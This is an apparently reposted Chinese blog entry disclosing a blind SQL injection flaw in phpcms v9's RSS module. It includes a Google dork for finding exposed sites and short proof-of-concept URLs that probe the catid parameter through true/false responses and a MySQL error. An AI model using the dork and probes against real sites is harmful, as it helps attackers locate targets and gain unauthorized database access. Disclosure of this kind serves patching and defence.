phpcms V9 BLind SQL 注入漏洞0day

本文整理自网络，侵删。

　　影响版本：phpcms v9 blind

　　官方网站：http://www.phpcms.cn

　　漏洞类型：SQL注入

　　漏洞描述：phpcms v9 blind 参数过滤存在SQL注入漏洞。

　　google dork:inurl:"index.php?m=content+c=rss+catid=10"

　　exploit & p0c

　　[!] index.php?m=content&c=rss&catid=[valid catid]

　　Example p0c

　　[!] http://host/index.php?m=content&c=rss&catid=10 <= True

　　[!] http://host/index.php?m=content&c=rss&catid=-10 <= False

　　[+] http://host/index.php?m=content&c=rss&catid=5 <= show MySQL Error (table)

更多PHPCMS内容来自木庄网络博客

标签：PHPCMS

相关阅读 >>

phpcms v9过滤采集内容中css样式的实现方法

建站常用13种php开源cms比较

phpcms 退出无法同步通知discuz问题的解决方法

phpcms v9碎片管理及调用技巧分享

dedecms中使用php语句指南

cms中php判断系统是否已经安装的方法示例

phpcms v9 整合discuz! x2.5 和ucenter 1.6.0详细图文教程

linux服务器下phpcms v9 安全配置详解

phpcms如何使用水印功能

phpcms二次开发之表单类使用指南

更多相关阅读请进入《phpcms》频道 >>

转载请注明出处：木庄网络博客 » phpcms V9 BLind SQL 注入漏洞0day